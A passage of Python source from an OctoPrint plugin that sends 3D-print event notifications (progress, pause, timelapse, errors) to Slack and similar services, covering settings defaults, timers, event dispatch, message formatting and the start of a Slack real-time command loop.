"Fallback": "Print paused: {pct_complete} - {print_name}",
"Color": "warning",
"CaptureSnapshot": True,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": True,
"ReportJobOrigEstimate": True,
"ReportJobProgress": True,
"ReportMovieStatus": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"PrintResumed": {
"Enabled": True,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Print resumed :runner:",
"Fallback": "Print resumed: {pct_complete} - {print_name}",
"Color": "good",
"CaptureSnapshot": True,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": True,
"ReportJobOrigEstimate": True,
"ReportJobProgress": True,
"ReportMovieStatus": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"MetadataAnalysisStarted": {
"Enabled": False,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: File analysis started :runner:",
"Fallback": "File metadata analysis started: {print_name}",
"Color": "good",
"CaptureSnapshot": False,
"ReportPrinterState": False,
"ReportEnvironment": False,
"ReportJobState": False,
"ReportJobOrigEstimate": False,
"ReportJobProgress": False,
"ReportMovieStatus": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"MetadataAnalysisFinished": {
"Enabled": False,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: File analysis complete :ok_hand:",
"Fallback": "File metadata analysis complete: {print_name}",
"Color": "good",
"CaptureSnapshot": False,
"ReportPrinterState": False,
"ReportEnvironment": False,
"ReportJobState": False,
"ReportJobOrigEstimate": False,
"ReportJobProgress": False,
"ReportMovieStatus": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"MovieRendering": {
"Enabled": False,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Timelapse movie rendering :clapper:",
"Fallback": "Timelapse movie rendering: {print_name}",
"Color": "good",
"CaptureSnapshot": False,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": False,
"ReportJobOrigEstimate": False,
"ReportJobProgress": False,
"ReportMovieStatus": True,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"MovieDone": {
"Enabled": False,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Timelapse movie rendering complete :movie_camera:",
"Fallback": "Timelapse movie rendering complete: {print_name}",
"Color": "good",
"CaptureSnapshot": False,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": False,
"ReportJobOrigEstimate": False,
"ReportJobProgress": False,
"ReportMovieStatus": True,
"UploadMovie": False,
"UploadMovieLink": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"MovieFailed": {
"Enabled": False,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Timelapse movie rendering failed :boom:",
"Fallback": "Timelapse movie rendering failed: {print_name}, Error: {error}",
"Color": "danger",
"CaptureSnapshot": False,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": False,
"ReportJobOrigEstimate": False,
"ReportJobProgress": False,
"ReportMovieStatus": True,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
},
"gcode_events": "",
"timezones": "|".join(pytz.common_timezones),
"timezone": "OS_Default",
"eta_date_format": "hh:mm tt <fuzzy date>",
}
def get_settings_restricted_paths(self):
return dict(
admin=[
["slack_apitoken_config", "api_token"],
["slack_webhook_config", "webhook_url"],
["pushbullet_config", "access_token"],
["pushover_config", "app_token"],
["rocketchat_config", "username"],
["rocketchat_config", "password"],
["matrix_config", "access_token"],
["s3_config", "AWSAccessKey"],
["s3_config", "AWSsecretKey"],
["s3_config", "s3Bucket"],
["minio_config", "AccessKey"],
["minio_config", "SecretKey"],
["minio_config", "Bucket"],
["minio_config", "Endpoint"],
["minio_config", "secure"],
["imgur_config", "client_id"],
["imgur_config", "client_secret"],
["imgur_config", "refresh_token"],
["imgur_config", "album_id"],
["additional_snapshot_urls"],
]
)
def get_settings_version(self):
return 1
def on_settings_save(self, data):
try:
octoprint.plugin.SettingsPlugin.on_settings_save(self, data)
self.update_progress_timer()
self.update_heartbeat_timer()
self.update_gcode_sent_listeners()
self._slack_next_progress_snapshot_time = 0
except Exception as e:
self._logger.exception(
"Error executing post-save actions, Error: " + str(e.message)
)
##~ TemplatePlugin mixin
##def get_template_vars(self):
## return dict()
def get_template_configs(self):
return [dict(type="settings", custom_bindings=False)]
##~~ AssetPlugin mixin
def get_assets(self):
return dict(
js=["js/Octoslack.js"],
css=["css/Octoslack.css"],
less=["less/Octoslack.less"],
)
##~~ Softwareupdate hook
def get_update_information(self):
# Define the configuration for your plugin to use with the Software Update
# Plugin here. See https://github.com/foosel/OctoPrint/wiki/Plugin:-Software-Update
# for details.
return dict(
Octoslack=dict(
displayName="Octoslack",
displayVersion=self._plugin_version,
# version check: github repository
type="github_release",
user="fraschetti",
repo="Octoslack",
current=self._plugin_version,
# update method: pip
pip="https://github.com/fraschetti/Octoslack/archive/{target_version}.zip",
)
)
##~~ StartupPlugin mixin
def on_after_startup(self):
self._logger.debug("Entering Slack RTM client init logic")
self.start_rtm_client()
self._logger.debug("Exited Slack RTM client init logic")
self.update_gcode_sent_listeners()
self.start_heartbeat_timer()
##~~ ShutdownPlugin mixin
def on_shutdown(self):
self.stop_rtm_client()
self._logger.debug("Stopped Slack RTM client")
self.stop_progress_timer()
self.stop_heartbeat_timer()
##~~ PrintProgress mixin
def on_print_progress(self, location, path, progress):
try:
progress_interval = int(
self._settings.get(["supported_events"], merged=True)
.get("Progress")
.get("IntervalPct")
)
self._logger.debug(
"Progress: "
+ str(progress)
+ " - IntervalPct: "
+ str(progress_interval)
)
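##Only fire the Progress event at exact multiples of the configured IntervalPct, excluding 0% and 100%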
if (
progress > 0
and progress < 100
and progress_interval > 0
and progress % progress_interval == 0
):
self.handle_event(
"Progress", None, {"progress": progress}, False, False, None
)
except Exception as e:
self._logger.exception(
"Error processing progress event, Error: " + str(e.message)
)
##~~ EventPlugin mixin
def progress_timer_tick(self):
self._logger.debug("Progress timer tick")
self.handle_event("Progress", None, {}, False, False, None)
print_cancel_time = None
progress_timer = None
heartbeat_timer = None
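##Starts the time-based Progress timer (IntervalTime, in minutes) only when the Progress notification/command is enabled and a print is currently active or paused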
def start_progress_timer(self):
progress_event = self._settings.get(["supported_events"], merged=True).get(
"Progress"
)
progress_notification_enabled = progress_event.get("Enabled")
progress_command_enabled = progress_event.get("CommandEnabled")
if not progress_notification_enabled and not progress_command_enabled:
return
progress_timer_interval = int(progress_event.get("IntervalTime"))
if (
progress_timer_interval > 0
and (self._printer.is_printing() or self._printer.is_paused())
and not self._printer.is_ready()
):
self._logger.debug(
"Starting progress timer: " + str(progress_timer_interval) + "min(s)"
)
self.progress_timer = RepeatedTimer(
progress_timer_interval * 60, self.progress_timer_tick, run_first=False
)
self.progress_timer.start()
def update_progress_timer(self):
restart = False
progress_event = self._settings.get(["supported_events"], merged=True).get(
"Progress"
)
progress_notification_enabled = progress_event.get("Enabled")
progress_command_enabled = progress_event.get("CommandEnabled")
if not progress_notification_enabled and not progress_command_enabled:
self.stop_progress_timer()
return
new_interval = int(progress_event.get("IntervalTime"))
if self.progress_timer == None and new_interval > 0:
restart = True
else:
existing_interval = 0
if not self.progress_timer == None:
existing_interval = self.progress_timer.interval
##OctoPrint wraps the interval in a lambda function
if callable(existing_interval):
existing_interval = existing_interval()
existing_interval = existing_interval / 60
self._logger.debug("New progress interval: " + str(new_interval))
self._logger.debug(
"Previous progress interval: " + str(existing_interval)
)
if new_interval != existing_interval:
restart = True
if restart and new_interval > 0:
self.stop_progress_timer()
self.start_progress_timer()
def stop_progress_timer(self):
if not self.progress_timer == None:
self._logger.debug("Stopping progress timer")
self.progress_timer.cancel()
self.progress_timer = None
def heartbeat_timer_tick(self):
self._logger.debug("Heartbeat timer tick")
##Color may be updated in process_slack_event
self.handle_event("Heartbeat", None, {}, False, False, None)
def start_heartbeat_timer(self):
heartbeat_event = self._settings.get(["supported_events"], merged=True).get(
"Heartbeat"
)
heartbeat_notification_enabled = heartbeat_event.get("Enabled")
heartbeat_command_enabled = heartbeat_event.get("CommandEnabled")
if not heartbeat_notification_enabled and not heartbeat_command_enabled:
return
heartbeat_timer_interval = int(heartbeat_event.get("IntervalTime"))
if heartbeat_timer_interval > 0:
self._logger.debug(
"Starting heartbeat timer: " + str(heartbeat_timer_interval) + "min(s)"
)
self.heartbeat_timer = RepeatedTimer(
heartbeat_timer_interval * 60,
self.heartbeat_timer_tick,
run_first=False,
)
self.heartbeat_timer.start()
def update_heartbeat_timer(self):
restart = False
heartbeat_event = self._settings.get(["supported_events"], merged=True).get(
"Heartbeat"
)
heartbeat_notification_enabled = heartbeat_event.get("Enabled")
heartbeat_command_enabled = heartbeat_event.get("CommandEnabled")
if not heartbeat_notification_enabled and not heartbeat_command_enabled:
self.stop_heartbeat_timer()
return
new_interval = int(heartbeat_event.get("IntervalTime"))
if self.heartbeat_timer == None and new_interval > 0:
restart = True
else:
existing_interval = 0
if not self.heartbeat_timer == None:
existing_interval = self.heartbeat_timer.interval
##OctoPrint wraps the interval in a lambda function
if callable(existing_interval):
existing_interval = existing_interval()
existing_interval = existing_interval / 60
self._logger.debug("New heartbeat interval: " + str(new_interval))
self._logger.debug(
"Previous heartbeat interval: " + str(existing_interval)
)
if new_interval != existing_interval:
restart = True
if restart and new_interval > 0:
self.stop_heartbeat_timer()
self.start_heartbeat_timer()
def stop_heartbeat_timer(self):
if not self.heartbeat_timer == None:
self._logger.debug("Stopping heartbeat timer")
self.heartbeat_timer.cancel()
self.heartbeat_timer = None
last_trigger_height = 0.0
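##Returns True when the new Z height has climbed at least IntervalHeight mm above the last trigger height while printing; used to drive height-based Progress events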
def process_zheight_change(self, payload):
if not self._printer.is_printing():
return False
if not "new" in payload:
return False
height_interval = float(
self._settings.get(["supported_events"], merged=True)
.get("Progress")
.get("IntervalHeight")
)
if height_interval <= 0:
return False
new = payload["new"]
if new <= self.last_trigger_height:
return False
if new >= (self.last_trigger_height + height_interval):
self._logger.debug(
"ZChange interval: "
+ str(height_interval)
+ ", Last trigger height: "
+ str(self.last_trigger_height)
+ ", Payload: "
+ json.dumps(payload)
)
self.last_trigger_height = new
return True
return False
def on_event(self, event, payload):
self.handle_event(event, None, payload, False, False, None)
event_last_processed = {} ##event --> timestamp map
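##Central event dispatcher - the override_* flags bypass the per-event Enabled/CommandEnabled checks (used by chat commands), and event_settings_overrides allows per-call tweaks to the stored event settings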
def handle_event(
self,
event,
channel_override,
payload,
override_notification_enabled_check,
override_command_enabled_check,
event_settings_overrides,
):
try:
if event == "PrintCancelled":
self.stop_progress_timer()
self.print_cancel_time = time.time()
self._bot_progress_last_req = None
with self._bot_progress_last_snapshot_queue.mutex:
self._bot_progress_last_snapshot_queue.queue.clear()
elif event == "PrintFailed":
self.stop_progress_timer()
self._bot_progress_last_req = None
with self._bot_progress_last_snapshot_queue.mutex:
self._bot_progress_last_snapshot_queue.queue.clear()
ignore_cancel_fail_event = self._settings.get(
["ignore_cancel_fail_event"], merged=True
)
##If the ignore flag is enabled and we've seen a PrintCancelled within 30s, ignore the PrintFailed event
if (
ignore_cancel_fail_event
and not self.print_cancel_time == None
and (time.time() - self.print_cancel_time) < 30
):
self._logger.debug(
"Ignoring PrintFailed event within accecptable window of a PrintCancelled event"
)
return
elif event == "PrintStarted":
self.start_progress_timer()
self.print_cancel_time = None
self.last_trigger_height = 0.0
self._bot_progress_last_req = None
with self._bot_progress_last_snapshot_queue.mutex:
self._bot_progress_last_snapshot_queue.queue.clear()
self._slack_next_progress_snapshot_time = 0
elif event == "PrintDone":
self.stop_progress_timer()
self.print_cancel_time = None
self._bot_progress_last_req = None
with self._bot_progress_last_snapshot_queue.mutex:
self._bot_progress_last_snapshot_queue.queue.clear()
elif event == "ZChange":
if self.process_zheight_change(payload):
self.handle_event("Progress", None, payload, False, False, None)
return
elif event == "MetadataAnalysisFinished":
##If using OctoPrint-PrintTimeGenius, don't register the finished event until it's actually done
if payload and "result" in payload:
analysis_result = payload["result"]
if (
"analysisPending" in analysis_result
and analysis_result["analysisPending"]
):
return
supported_events = self._settings.get(["supported_events"], merged=True)
if supported_events == None or not event in supported_events:
return
event_settings = supported_events[event]
if event_settings == None:
return
if not event_settings_overrides == None:
for key in event_settings_overrides:
event_settings[key] = event_settings_overrides[key]
notification_enabled = (
override_notification_enabled_check or event_settings["Enabled"]
)
command_enabled = (
override_command_enabled_check or event_settings["CommandEnabled"]
)
if not notification_enabled and not command_enabled:
return
if payload == None:
payload = {}
self._logger.debug(
"Event: "
+ event
+ ", NotificationEnabled: "
+ str(notification_enabled)
+ ", CommandEnabled: "
+ str(command_enabled)
+ ", Payload: "
+ str(payload)
)
last_processed_key = event
if event == "GcodeEvent":
last_processed_key = event + "_" + event_settings["InternalName"]
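##Throttle: skip the event if fewer than MinNotificationInterval minutes have passed since this event type was last processed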
if (
"MinNotificationInterval" in event_settings
and last_processed_key in self.event_last_processed
and not override_notification_enabled_check
):
min_notification_interval = int(
event_settings["MinNotificationInterval"]
)
if min_notification_interval > 0:
prev_timestamp = self.event_last_processed[last_processed_key]
now = time.time()
if now < (prev_timestamp + (min_notification_interval * 60)):
self._logger.debug(
"Ignoring "
+ event
+ " event to satisfy min notification interval"
)
return
self.event_last_processed[last_processed_key] = time.time()
self.process_slack_event(
event,
event_settings,
channel_override,
payload,
notification_enabled,
command_enabled,
)
except Exception as e:
self._logger.exception(
"Error processing event: " + event + ", Error: " + str(e.message)
)
def get_origin_text(self, print_origin):
if print_origin == "local":
return "OctoPrint"
elif print_origin == "sdcard":
return "SD Card"
elif print_origin == None:
return "N/A"
return print_origin
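##Builds the message text, fields, and footer from the event settings and the current printer/job state, then (when enabled) kicks off the custom command and notification sends on background threads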
def process_slack_event(
self,
event,
event_settings,
channel_override,
event_payload,
notification_enabled,
command_enabled,
):
fallback = ""
pretext = ""
title = ""
text = ""
text_arr = []
color = ""
fields = []
footer = ""
command = ""
includeSnapshot = False
reportPrinterState = False
reportEnvironment = False
reportJobState = False
reportJobOrigEstimate = False
reportJobProgress = False
reportMovieStatus = False
reportFinalPrintTime = False
includeSupportedCommands = False
bold_text_start, bold_text_end, name_val_sep, newline = (
self.get_formatting_elements()
)
if (
channel_override == None or len(channel_override.strip()) == 0
) and "ChannelOverride" in event_settings:
channel_override = event_settings["ChannelOverride"]
if "Fallback" in event_settings:
fallback = event_settings["Fallback"]
if "Message" in event_settings:
pretext = event_settings["Message"]
if "Color" in event_settings:
color = event_settings["Color"]
if "Command" in event_settings:
command = event_settings["Command"]
if "CaptureSnapshot" in event_settings:
includeSnapshot = event_settings["CaptureSnapshot"]
if "ReportPrinterState" in event_settings:
reportPrinterState = event_settings["ReportPrinterState"]
if "ReportEnvironment" in event_settings:
reportEnvironment = event_settings["ReportEnvironment"]
if "ReportJobState" in event_settings:
reportJobState = event_settings["ReportJobState"]
if "ReportJobOrigEstimate" in event_settings:
reportJobOrigEstimate = event_settings["ReportJobOrigEstimate"]
if "ReportJobProgress" in event_settings:
reportJobProgress = event_settings["ReportJobProgress"]
if "ReportMovieStatus" in event_settings:
reportMovieStatus = event_settings["ReportMovieStatus"]
if "ReportFinalPrintTime" in event_settings:
reportFinalPrintTime = event_settings["ReportFinalPrintTime"]
if "IncludeSupportedCommands" in event_settings:
includeSupportedCommands = event_settings["IncludeSupportedCommands"]
replacement_params = {
"{print_name}": "N/A",
"{pct_complete}": "N/A",
"{current_z}": "N/A",
"{elapsed_time}": "N/A",
"{remaining_time}": "N/A",
"{eta}": "N/A",
"{error}": "N/A",
"{cmd}": "N/A",
"{ip_address}": "N/A",
"{hostname}": "N/A",
"{fqdn}": "N/A",
"{printer_status}": "N/A",
}
printer_data = self._printer.get_current_data()
printer_state = printer_data["state"]
job_state = printer_data["job"]
z_height = printer_data["currentZ"]
progress_state = printer_data["progress"]
file_name = job_state["file"]["name"]
if file_name == None:
file_name = "N/A"
##Override the print_name variable for the analysis events
if event == "MetadataAnalysisStarted" or event == "MetadataAnalysisFinished":
if "name" in event_payload:
file_name = event_payload["name"]
else:
file_name = "N/A"
print_origin = "N/A"
if "origin" in event_payload:
print_origin = self.get_origin_text(event_payload["origin"])
fileStr = file_name + " (via " + print_origin + ")"
text_arr.append(
bold_text_start + "File" + bold_text_end + name_val_sep + fileStr
)
if event == "MetadataAnalysisFinished":
estimated_print_time = "N/A"
analysis_print_time = None
compensated_print_time = None
if "result" in event_payload:
analysis_result = event_payload["result"]
if "estimatedPrintTime" in analysis_result:
estimated_print_time = self.format_duration(
analysis_result["estimatedPrintTime"]
)
if "analysisPrintTime" in analysis_result:
analysis_print_time = self.format_duration(
analysis_result["analysisPrintTime"]
)
if "compensatedPrintTime" in analysis_result:
compensated_print_time = self.format_duration(
analysis_result["compensatedPrintTime"]
)
if analysis_print_time and compensated_print_time:
text_arr.append(
bold_text_start
+ "Analyzed print time estimate"
+ bold_text_end
+ name_val_sep
+ analysis_print_time
)
text_arr.append(
bold_text_start
+ "Compensated print time estimate"
+ bold_text_end
+ name_val_sep
+ compensated_print_time
)
else:
text_arr.append(
bold_text_start
+ "Estimated print time"
+ bold_text_end
+ name_val_sep
+ estimated_print_time
)
replacement_params["{print_name}"] = file_name
z_height_str = ""
if not z_height == None and not z_height == "None":
z_height_str = ", Nozzle Height: " + "{0:.2f}".format(z_height) + "mm"
replacement_params["{current_z}"] = z_height_str
printer_text = printer_state["text"]
if not printer_text == None:
printer_text = printer_text.strip()
replacement_params["{printer_status}"] = printer_text
self._logger.debug("Printer data: " + str(printer_data))
##Override Heartbeat event color if printer is in an error state
if event == "Heartbeat" and self._printer.is_closed_or_error():
color = "danger"
if reportJobState:
print_origin = job_state["file"]["origin"]
print_origin = self.get_origin_text(print_origin)
file_bytes = job_state["file"]["size"]
if file_bytes == None:
file_bytes = 0
file_size = octoprint.util.get_formatted_size(file_bytes)
if file_bytes > 0:
jobStateStr = (
file_name + " (" + file_size + " via " + print_origin + ")"
)
else:
jobStateStr = file_name
text_arr.append(
bold_text_start + "File" + bold_text_end + name_val_sep + jobStateStr
)
if reportJobOrigEstimate:
estimatedPrintTime = None
if "lastPrintTime" in job_state:
estimatedPrintTime = job_state["lastPrintTime"]
if estimatedPrintTime == None:
estimatedPrintTime = job_state["estimatedPrintTime"]
if estimatedPrintTime == None:
estimatedPrintTime = "N/A"
estimatedPrintTimeStr = "N/A"
else:
estimatedPrintTimeStr = self.format_duration(estimatedPrintTime)
if self._printer.is_printing():
estimatedFinish = self.format_eta(estimatedPrintTime)
else:
estimatedFinish = "N/A"
replacement_params["{remaining_time}"] = estimatedPrintTimeStr
replacement_params["{eta}"] = estimatedFinish
text_arr.append(
bold_text_start
+ "Estimated print time"
+ bold_text_end
+ name_val_sep
+ estimatedPrintTimeStr
)
if event != "PrintDone" and self._printer.is_printing():
text_arr.append(
bold_text_start
+ "ETA"
+ bold_text_end
+ name_val_sep
+ estimatedFinish
)
if event == "Progress" and "progress" in event_payload:
pct_complete = event_payload["progress"]
else:
pct_complete = progress_state["completion"]
if not pct_complete == None:
pct_complete = str(int(pct_complete)) + "%"
if not pct_complete == None:
replacement_params["{pct_complete}"] = pct_complete
elapsed = progress_state["printTime"]
time_left = progress_state["printTimeLeft"]
elapsed_str = self.format_duration(elapsed)
replacement_params["{elapsed_time}"] = elapsed_str
##Use existing remaining time if it's already been set
if replacement_params["{remaining_time}"] == "N/A":
time_left_str = self.format_duration(time_left)
replacement_params["{remaining_time}"] = time_left_str
else:
time_left_str = replacement_params["{remaining_time}"]
##Use existing ETA if it's already been set
if replacement_params["{eta}"] == "N/A" and self._printer.is_printing():
eta_str = self.format_eta(time_left)
replacement_params["{eta}"] = eta_str
else:
eta_str = replacement_params["{eta}"]
if reportJobProgress and not pct_complete == None:
text_arr.append(
bold_text_start + "Elapsed" + bold_text_end + name_val_sep + elapsed_str
)
text_arr.append(
bold_text_start
+ "Remaining"
+ bold_text_end
+ name_val_sep
+ time_left_str
)
if self._printer.is_printing():
text_arr.append(
bold_text_start + "ETA" + bold_text_end + name_val_sep + eta_str
)
##Is rendered as a footer so it's safe to always include this
if reportPrinterState:
printer_temps = self._printer.get_current_temperatures()
temp_str = ""
if not printer_temps == None and "bed" in printer_temps:
temp_str = ""
for key in printer_temps:
if key == "bed":
temp_str += (
", Bed: "
+ str(printer_temps["bed"]["actual"])
+ unichr(176)
+ "C/"
+ str(printer_temps["bed"]["target"])
+ unichr(176)
+ "C"
)
elif key.startswith("tool"):
nozzle_name = "Nozzle"
printer_profile = (
self._printer_profile_manager.get_current_or_default()
)
shared_nozzle = printer_profile["extruder"]["sharedNozzle"]
nozzle_number = key[4:]
if shared_nozzle and nozzle_number and nozzle_number != "0":
# only show the first nozzle if they are 'shared'
self._logger.debug(
"Skipping nozzle {} because it is shared.".format(
nozzle_number
)
)
else:
if len(printer_temps) > 2:
nozzle_name += key[4:]
temp_str += (
", "
+ nozzle_name
+ ": "
+ str(printer_temps[key]["actual"])
+ unichr(176)
+ "C/"
+ str(printer_temps[key]["target"])
+ unichr(176)
+ "C"
)
footer = "Printer: " + printer_text + temp_str + z_height_str
##Skip this if not sending a notification (not currently available for command execution)
if notification_enabled and self._settings.get(
["include_raspi_temp"], merged=True
):
rpi_tmp = None
try:
p = run("/opt/vc/bin/vcgencmd measure_temp", stdout=Capture())
rpi_tmp = p.stdout.text
if not rpi_tmp == None and rpi_tmp.startswith("temp="):
rpi_tmp = rpi_tmp.strip()
rpi_tmp = rpi_tmp[5:-2]
else:
rpi_tmp = None
except Exception as e:
if type(e) == ValueError:
self._logger.error(
"Unable to execute Raspberry Pi command (/opt/vc/bin/vcgencmd): "
+ e.message
)
else:
self._logger.exception(
"Error reading Raspberry Pi temp - Error: " + str(e)
)
if not rpi_tmp == None:
if len(footer) > 0:
footer += ", "
footer += "RasPi: " + rpi_tmp + unichr(176) + "C"
if reportEnvironment:
if len(footer) > 0:
footer += ", "
footer += "OctoPrint: " + get_octoprint_version_string()
footer += ", " + self._plugin_name + ": v" + self._plugin_version
final_time = "N/A"
if event == "PrintDone" and "time" in event_payload:
final_time = self.format_duration(event_payload["time"])
replacement_params["{elapsed_time}"] = final_time
if reportFinalPrintTime:
text_arr.append(
bold_text_start
+ "Final print time"
+ bold_text_end
+ name_val_sep
+ final_time
)
if event == "GcodeEvent" and "cmd" in event_payload:
replacement_params["{cmd}"] = event_payload["cmd"]
if reportMovieStatus:
movie_name = None
print_filename = None
if "movie_basename" in event_payload:
movie_name = event_payload["movie_basename"]
if "gcode" in event_payload:
print_filename = event_payload["gcode"]
if not movie_name == None:
text_arr.append(
bold_text_start
+ "Movie"
+ bold_text_end
+ name_val_sep
+ movie_name
)
if not print_filename == None:
text_arr.append(
bold_text_start
+ "Print job"
+ bold_text_end
+ name_val_sep
+ print_filename
)
ips = self.get_ips()
ips_str = ", ".join(ips)
replacement_params["{ip_address}"] = ips_str
replacement_params["{hostname}"] = self.get_hostname()
replacement_params["{fqdn}"] = self.get_fqdn()
if includeSupportedCommands:
enabled_commands = self._settings.get(
["slack_rtm_enabled_commands"], merged=True
)
unauthorized_reaction = self._settings.get(
["slack_apitoken_config"], merged=True
).get("commands_unauthorized_reaction")
authorized_users = self._settings.get(
["slack_rtm_authorized_users"], merged=True
)
if len(authorized_users.strip()) == 0:
authorized_users = None
if enabled_commands["help"]["enabled"]:
text_arr.append(
bold_text_start
+ "help"
+ bold_text_end
+ " - Displays this list of commands"
+ (
" " + unauthorized_reaction
if authorized_users and enabled_commands["help"]["restricted"]
else ""
)
)
if enabled_commands["status"]["enabled"]:
text_arr.append(
bold_text_start
+ "status"
+ bold_text_end
+ " - Display the current print job status"
+ (
" " + unauthorized_reaction
if authorized_users and enabled_commands["status"]["restricted"]
else ""
)
)
if enabled_commands["stop"]["enabled"]:
text_arr.append(
bold_text_start
+ "stop"
+ bold_text_end
+ " - Stop the current print"
+ (
" " + unauthorized_reaction
if authorized_users and enabled_commands["stop"]["restricted"]
else ""
)
)
if enabled_commands["pause"]["enabled"]:
text_arr.append(
bold_text_start
+ "pause"
+ bold_text_end
+ " - Pause the current print"
+ (
" " + unauthorized_reaction
if authorized_users and enabled_commands["pause"]["restricted"]
else ""
)
)
if enabled_commands["resume"]["enabled"]:
text_arr.append(
bold_text_start
+ "resume"
+ bold_text_end
+ " - Resume a paused print"
+ (
" " + unauthorized_reaction
if authorized_users and enabled_commands["resume"]["restricted"]
else ""
)
)
error = None
if "error" in event_payload:
error = event_payload["error"]
if not error == None:
error = error.strip()
if not error == None and len(error) > 0:
text_arr.append(
bold_text_start + "Error" + bold_text_end + name_val_sep + error
)
replacement_params["{error}"] = error
if not text_arr == None and len(text_arr) > 0:
text = newline.join(text_arr)
for param in replacement_params:
if not fallback == None:
fallback = fallback.replace(param, replacement_params[param])
if not pretext == None:
pretext = pretext.replace(param, replacement_params[param])
if not title == None:
title = title.replace(param, replacement_params[param])
if not text == None:
text = text.replace(param, replacement_params[param])
if not footer == None:
footer = footer.replace(param, replacement_params[param])
if not command == None:
command = command.replace(param, shell_quote(replacement_params[param]))
for field in fields:
if "title" in field:
field["title"] = field["title"].replace(
param, replacement_params[param]
)
if "value" in field:
field["value"] = field["value"].replace(
param, replacement_params[param]
)
##Execute custom command
capture_command_returncode = False
capture_command_output = False
if (
notification_enabled
and "CaptureCommandReturnCode" in event_settings
and event_settings["CaptureCommandReturnCode"]
):
capture_command_returncode = True
if (
notification_enabled
and "CaptureCommandOutput" in event_settings
and event_settings["CaptureCommandOutput"]
):
capture_command_output = True
command_thread = None
command_thread_rsp = None
if command_enabled:
command_thread_rsp = Queue.Queue()
command_thread = threading.Thread(
target=self.execute_command,
args=(event, command, capture_command_output, command_thread_rsp),
)
command_thread.start()
##Execute notification send
if notification_enabled:
notification_thread = threading.Thread(
target=self.send_slack_message,
args=(
event,
event_settings,
event_payload,
channel_override,
fallback,
pretext,
title,
text,
color,
fields,
footer,
includeSnapshot,
replacement_params["{pct_complete}"],
command_thread,
command_thread_rsp,
capture_command_returncode,
capture_command_output,
),
)
notification_thread.start()
# Currently only querying IPv4 although the library supports IPv6 as well
def get_ips(self):
ips = []
try:
for interface in netifaces.interfaces():
for link in netifaces.ifaddresses(interface).get(netifaces.AF_INET, ()):
addr = link["addr"]
if not addr == None and len(addr.strip()) > 0 and addr != "127.0.0.1":
ips.append(addr)
except Exception as e:
self._logger.exception("Failed to query IP address: " + str(e))
ips = []
ips.append("'IP detection error'")
return ips
def get_hostname(self):
try:
return socket.gethostname()
except Exception as e:
self._logger.exception("Failed to query hostname: " + str(e))
return "Hostname detection error"
def get_fqdn(self):
try:
return socket.getfqdn()
except Exception as e:
self._logger.exception("Failed to query fqdn: " + str(e))
return "Fqdn detection error"
def start_rtm_client(self):
self.stop_rtm_client()
if not self._settings.get(["slack_apitoken_config"], merged=True).get(
"enable_commands"
):
return
connection_method = self.connection_method()
if connection_method == None or connection_method != "APITOKEN":
self._logger.debug("Slack RTM client not enabled")
return
slackAPIToken = self._settings.get(["slack_apitoken_config"], merged=True).get(
"api_token"
)
if not slackAPIToken:
self._logger.warn(
"Cannot enable real time messaging client for responding to commands without an API Key"
)
return
slackAPIToken = slackAPIToken.strip()
self._logger.debug("Before Slack RTM client start")
self.rtm_keep_running = True
self.bot_user_id = None
t = threading.Thread(target=self.execute_rtm_loop, args=(slackAPIToken,))
t.setDaemon(True)
t.start()
self._logger.debug("After Slack RTM client start")
def stop_rtm_client(self):
self._logger.debug("Stopping Slack RTM client")
self.rtm_keep_running = False
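##Main Slack RTM loop: (re)connects with exponential backoff, pings the server every few seconds to keep the websocket alive, and dispatches any messages that are read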
def execute_rtm_loop(self, slackAPIToken):
try:
ping_interval = 5
self._logger.debug("Starting Slack RTM wait loop")
sc = None
connection_attempt = 0
next_ping = 0
repeat_error_count = 0
while self.rtm_keep_running:
while sc == None or not sc.server.connected:
try:
##Reset read error count if we're reconnecting
repeat_error_count = 0
##Roll over the counter to keep delay calculations under control
if connection_attempt > 100:
connection_attempt = 0
self._logger.debug(
"Attempting to connect Slack RTM API (iteration="
+ str(connection_attempt)
+ ")"
)
wait_delay = self.get_rtm_reconnect_delay(connection_attempt)
if wait_delay > 0:
self._logger.debug(
"Sleeping for "
+ str(wait_delay)
+ " seconds before attempting connection"
)
time.sleep(wait_delay)
slackAPIConnection = Slacker(
slackAPIToken, timeout=SLACKER_TIMEOUT
)
auth_rsp = slackAPIConnection.auth.test()
self._logger.debug(
"Slack RTM API Key auth test response: "
+ json.dumps(auth_rsp.body)
)
if auth_rsp.successful == None or auth_rsp.successful == False:
self._logger.error(
"Slack RTM API Key auth test failed: "
+ json.dumps(auth_rsp.body)
)
connection_attempt += 1
continue
self.bot_user_id = auth_rsp.body["user_id"]
self._logger.debug("Slack RTM Bot user id: " + self.bot_user_id)
##Slack's client doesn't expose the underlying websocket/socket
##so we unfortunately need to rely on Python's GC to handle
